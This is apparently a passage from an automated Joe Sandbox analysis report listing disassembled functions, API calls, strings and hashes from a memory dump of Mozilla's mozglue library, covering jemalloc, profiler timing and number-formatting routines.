IsDebuggerPresent.KERNEL32 ref: 66636009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 66636024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Q]f,?), ref: 66636046
OutputDebugStringA.KERNEL32(?,Q]f,?), ref: 66636061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 66636069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 66636073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 66636082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6665148E), ref: 66636091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Q]f,00000000,?), ref: 666360BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 666360C4

Strings

Q]f, xrefs: 66635FFC, 66636042, 66636045, 666360B3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID: Q]f
API String ID: 3835517998-4291296772
Opcode ID: 4f1949a21f197d8cc57b20c39a10cc1af2c21f16c940006da82063cd76e6fe56
Instruction ID: c493eaa3301c848584bb0b3e2b50242c15b59cf366eab678f8949cc50ce43e33
Opcode Fuzzy Hash: 4f1949a21f197d8cc57b20c39a10cc1af2c21f16c940006da82063cd76e6fe56
Instruction Fuzzy Hash: B6210B709002189FDF109F25EC0AAAE7BBAFF85314F00C468E95AD7240CB75A955CFD5

Function 665FD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6660D1C5), ref: 665FD4F2
LeaveCriticalSection.KERNEL32(6665E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6660D1C5), ref: 665FD50B

Part of subcall function 665DCFE0: EnterCriticalSection.KERNEL32(6665E784), ref: 665DCFF6
Part of subcall function 665DCFE0: LeaveCriticalSection.KERNEL32(6665E784), ref: 665DD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6660D1C5), ref: 665FD52E
EnterCriticalSection.KERNEL32(6665E7DC), ref: 665FD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 665FD6A6
LeaveCriticalSection.KERNEL32(6665E7DC), ref: 665FD712
LeaveCriticalSection.KERNEL32(6665E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6660D1C5), ref: 665FD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 665FD7EA

Strings

: (malloc) Error initializing arena, xrefs: 665FD82C
<jemalloc>, xrefs: 665FD827

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: baa0100d25b20b951c82d130dab6f76f43356e8ad2cb3d9794a114dd08bf2f2a
Instruction ID: 12444af4845f4cb24516e433c174a9c623fdc077443dc298c99a441aea529ab0
Opcode Fuzzy Hash: baa0100d25b20b951c82d130dab6f76f43356e8ad2cb3d9794a114dd08bf2f2a
Instruction Fuzzy Hash: C0910571A147518FDB58CF29D49232ABBE2FBC9314F158A2EE55AC7681D730E841CF82

Function 66634EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 66634EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 66634F2E
moz_xmalloc.MOZGLUE ref: 66634F52
memset.VCRUNTIME140(00000000,00000000), ref: 66634F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 666352B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 666352E6
Sleep.KERNEL32(00000010), ref: 66635481
free.MOZGLUE(?), ref: 66635498

Strings

(, xrefs: 66635250

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 888014f8bcd6222c459ae883319628ad7775671d2300dfe9018bbb42b7622157
Instruction ID: 90442d935cdd1898b8d38dac52612e379fc832a3145c8e34b28c735ed7124618
Opcode Fuzzy Hash: 888014f8bcd6222c459ae883319628ad7775671d2300dfe9018bbb42b7622157
Instruction Fuzzy Hash: 23F1F471A18B108FC716DF39D85162BB7E6AFD6384F05872EF946A3251DB31D842CB81

Function 66615190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 666151DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6661529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 666152FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6661536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 666153F7

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 666156C3
__Init_thread_footer.LIBCMT ref: 666156E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 666156BE

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: e3c82d105b5fb0f5b83afd10b6597cbc56a71eac8d66432a6be750a5bc3f3f88
Instruction ID: 6aacfa74cddb7f9fec18aa25d22184cbfa06a31ae94fa0b713ac0d5c86b373d2
Opcode Fuzzy Hash: e3c82d105b5fb0f5b83afd10b6597cbc56a71eac8d66432a6be750a5bc3f3f88
Instruction Fuzzy Hash: 52E17EB1D18F458AC713DF39E850267F7B6BF9B384F10DB0EE8AA2A151DB30E4568641

Function 66637030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 66637046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 66637060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6663707E

Part of subcall function 665E81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 665E81DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 66637096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6663709C
LocalFree.KERNEL32(?), ref: 666370AA

Strings

(null), xrefs: 6663706A, 66637083
### ERROR: %s: %s, xrefs: 66637087

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: b8b49cce86758d2107437a4ed4350953f407ec69fb8d3cbc258884778ba6b614
Instruction ID: 2ae4aedf622916e92779e3e675af53bf6e24af6a0fdd047a7b253f1a0ca85207
Opcode Fuzzy Hash: b8b49cce86758d2107437a4ed4350953f407ec69fb8d3cbc258884778ba6b614
Instruction Fuzzy Hash: 260196B1900114ABDB049FA5EC5BDAF7BAEEF89254B050025FA05A3141D671A9148BE5

Function 66622C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 66622C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 66622C61

Part of subcall function 665D4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 665D4E5A
Part of subcall function 665D4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 665D4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 66622C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 66622E2D

Part of subcall function 665E81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 665E81DE

Strings

(root), xrefs: 6662354F
expected a Time entry, xrefs: 66622E36
ProfileBuffer parse error: %s, xrefs: 66622E3B

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 7fca7a37b0dc06d9493ff6e81d7c846a6eae7ebf9ac6b2fca54c61dbfb541f94
Instruction ID: 75250d9ef1d542609250bad366f9b5e7141c4ef28d6e4ac9feb7ecebab4fd332
Opcode Fuzzy Hash: 7fca7a37b0dc06d9493ff6e81d7c846a6eae7ebf9ac6b2fca54c61dbfb541f94
Instruction Fuzzy Hash: 5891D070A087808FD724DF24E88165FBBE9AFC9358F10892DE59A9B350DB30D945CF96

Function 66639E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 66639F3D
__aulldiv.LIBCMT ref: 66639F77
__aullrem.LIBCMT ref: 66639F8C
__aulldiv.LIBCMT ref: 6663A023

Strings

NaN, xrefs: 66639EAB
-Infinity, xrefs: 66639E60, 66639E7B

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 414099e26beacd8c9d41ceff6f15cd8be1b4bdbb0505e58a58368cc0157d8939
Instruction ID: b5f5d52c63c5727a44eeb18205c358df45c7e10c66e434ae86199ebc4490b7ee
Opcode Fuzzy Hash: 414099e26beacd8c9d41ceff6f15cd8be1b4bdbb0505e58a58368cc0157d8939
Instruction Fuzzy Hash: B0C19B71E003298BDF14CFA8D8917AEBBB6EF88319F145529D406BB280DB71AD45CBD1

Function 665E0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,665E0DF8), ref: 665E0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 665E0EA1
__Init_thread_footer.LIBCMT ref: 665E0EB5
FreeLibrary.KERNEL32 ref: 665E0EC5

Strings

GetProcessMitigationPolicy, xrefs: 665E0E9B
kernel32.dll, xrefs: 665E0E7D

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 00cb27771894238c0acfdd412aa8cd0a7890d9d1d3518b7ac24e55f9f8e61438
Instruction ID: 75e07bd56fbc9e465f2f77ad9f5be11422d710940b3a7e8be68ee729278a65a1
Opcode Fuzzy Hash: 00cb27771894238c0acfdd412aa8cd0a7890d9d1d3518b7ac24e55f9f8e61438
Instruction Fuzzy Hash: B60146709007A2CBEF10DFAAF917A223BA7F7C6355F000166EB0192240DB70F424CE95

Function 666453C8 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 310COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 666486AE

Strings

~q]f, xrefs: 6664921F, 666456C7, 66645703, 66649269, 66645740, 66649459, 6664948F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memset
String ID: ~q]f
API String ID: 2221118986-1414786464
Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction ID: 66abe2a1df7f4986a3adb3b0d36f74ceb75a7a277655339198ad0e1e985ef5eb
Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction Fuzzy Hash: 88C1C372E0011A8FDB14CF68CC81BEDB7B2EF95314F1542A9C949EB355D730A999CB90

Function 6664545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 66648A4B

Strings

~q]f, xrefs: 6664921F, 666456C7, 66645703, 66649269, 66645740, 66649459, 6664948F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memset
String ID: ~q]f
API String ID: 2221118986-1414786464
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: eb3472fb1eb90d3b461dfac6e6d2512e2f5b5c4dbad26e3d9637c146c49e6545
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: A3B10772E0021A8FDB14CF68DC917E9B7B2EF95314F1842A9C549EB391D730AD95CB90

Function 6664542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 666488F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6664925C

Strings

~q]f, xrefs: 6664921F, 666456C7, 66645703, 66649269, 66645740, 66649459, 6664948F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memset
String ID: ~q]f
API String ID: 2221118986-1414786464
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 0be23b346cc4cc367845378a6f391bc67496e3bb9560a20b63ffdbfc9f105492
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: E2B1D472E0020A8FDB14CF68DC816EDBBB6EF95314F144279C949EB395D730A999CB90

Function 666450C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 66648E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6664925C

Strings

~q]f, xrefs: 6664921F, 666456C7, 66645703, 66649269, 66645740, 66649459, 6664948F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memset
String ID: ~q]f
API String ID: 2221118986-1414786464
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: e0262599cc76691f7bd45059246f5f73b90e4c0503b354248d40a0ad40f7280f
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 48A10672E0011A8FDB14CF68CC817E9B7B2AF95314F1582B9C949EB395D730AD99CB90

Function 6663B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 665E9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6663B92D), ref: 665E9BC8
Part of subcall function 665E9B80: __Init_thread_footer.LIBCMT ref: 665E9BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,665E03D4,?), ref: 6663B955
NtQueryVirtualMemory.NTDLL ref: 6663B9A5
NtQueryVirtualMemory.NTDLL ref: 6663BA20
RtlNtStatusToDosError.NTDLL ref: 6663BA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6663BA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6663BA86

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 50a6cedefc81ec97cbfda40bdec39d53ace1ad6d1a28547918f94c52ce833a38
Instruction ID: bff78b8282730b02a5bb77d7d6bed6aeb70f9d144229d300b23cea7a46662c1e
Opcode Fuzzy Hash: 50a6cedefc81ec97cbfda40bdec39d53ace1ad6d1a28547918f94c52ce833a38
Instruction Fuzzy Hash: 8D515B71E00A29DFDF18CFA8E881ADDBBB6EB98314F145129E901B7244DB30AD45CB91

Function 66618AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6660FA80: GetCurrentThreadId.KERNEL32 ref: 6660FA8D
Part of subcall function 6660FA80: AcquireSRWLockExclusive.KERNEL32(6665F448), ref: 6660FA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,66631563), ref: 66618BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,66631563), ref: 66618C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,66631563), ref: 66618C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,66631563), ref: 66618CBA
free.MOZGLUE(?), ref: 66618CCF

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: d47b2c913099d20fa8c9038413474a4fd6a24deb09d2005cfd050f67ebbc8066
Instruction ID: b4ba07b2a4636089693b2333dd7cfd90e9c958086e113fd25edbcf6d8b5c1275
Opcode Fuzzy Hash: d47b2c913099d20fa8c9038413474a4fd6a24deb09d2005cfd050f67ebbc8066
Instruction Fuzzy Hash: 20717075A18B019FD704CF29D58061AFBF1FF99314F458A5DE9899B322E770E880CB81

Function 665DF280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 665DF2B4
GetProcAddress.KERNEL32(00000000,?), ref: 665DF2F0
NtQueryVirtualMemory.NTDLL ref: 665DF308
RtlNtStatusToDosError.NTDLL ref: 665DF36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 665DF371

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: e505f758935e847fd9efe7c195008615d7226f023e51b54b114ca4b779856ad3
Instruction ID: 70d043ec9d938d98aa99bf852c172613d7b83d0b80db95a720c651ffa4d1ef33
Opcode Fuzzy Hash: e505f758935e847fd9efe7c195008615d7226f023e51b54b114ca4b779856ad3
